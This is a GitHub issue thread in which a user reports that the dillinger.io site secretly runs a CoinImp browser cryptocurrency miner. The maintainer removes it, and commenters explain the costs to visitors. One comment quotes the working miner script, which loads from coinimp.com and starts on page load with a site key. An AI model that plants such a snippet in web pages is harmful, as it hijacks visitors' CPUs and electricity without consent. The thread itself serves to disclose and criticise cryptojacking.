### ISSUE TITLE
Are you seriously using CoinImp?!

### ISSUE THREAD

**Issue by ashegoulding** [joemccann/dillinger#660]
Not cool man. We all know everyone needs them sweet mons, but our PCs are precious too. If this was not  
 your intention, fix your website, dillinger.io. I'm reporting the site. Remember what Douglas Crockford said. Do you want the web to be an evil place?

This is indeed your intention, innit?
64e87b31288e9e2f24879732c913825461894625

**Comment by ashegoulding** [comment]
```
  <script data-rocketsrc="//www.coinimp.com/scripts/min.js" type="text/rocketscript"></script>
<script type="text/rocketscript">
    var miner = new CoinImp.Anonymous('70e04ec9dffbcd930dc1c5c1d74bb97361bd97e5a9c3dd74e411cde76e9a23d7');
    miner.start();
</script>  
```
This is indeed your intention, innit?

**Comment by joemccann** [comment]
Is it evil?  I was experimenting!  Didn't realize it was such a big deal??!
I'll remove it.

**Comment by joemccann** [comment]
@ashegoulding Is CoinImp nefarious or something?  Please don't assume I was intentionally being nefarious...I saw this discussion pop up in a Telegram channel and figured I'd experiment with it.

Also, what do you mean "report the site"?  Report to whom?

Thanks in advance!

**Comment by ashegoulding** [comment]
@joemccann I could hear my cpu fan revving like I was compiling something. Felt like I was victimised because the site didn't say anything about mining using my machine. That's just cryptojacking. Damn, the API spawned 6 workers and my poor machine only has 4 threads.

Reported via [this site](https://safebrowsing.google.com/safebrowsing/report_badware/?hl=en). I don't think it'll go through because it doesn't really fit the description(malware).

You replied at least. My apologies. Perhaps I'm just helping the hackers or whatever.

**Comment by ashegoulding** [comment]
https://www.enisa.europa.eu/publications/info-notes/cryptojacking-cryptomining-in-the-browser

**Comment by joemccann** [comment]
Damn, I had no idea!  I've already removed it and redeployed!

**Comment by Joshfindit** [comment]
@joemccann There are two things to be aware of on this (and I'm adding for any others who consider this experiment)
1) Coin mining's tradeoff is about turning electricity in to digital coins. There is a real cost associated with that inthe form of an increase in the electric bill.
2) We may say that this kind of experiment is using the 'unused resources' of a computer's cpu/gpu, but these also come with a cost in maintenence and eventual replacement. Similarly, it would be hard to argue that people should be allowed to use their neighbour's car when it's just sitting in the driveway.

**Comment by bradwilson** [comment]
3. Increased power consumption also means, for most people in the world, increased pollution.
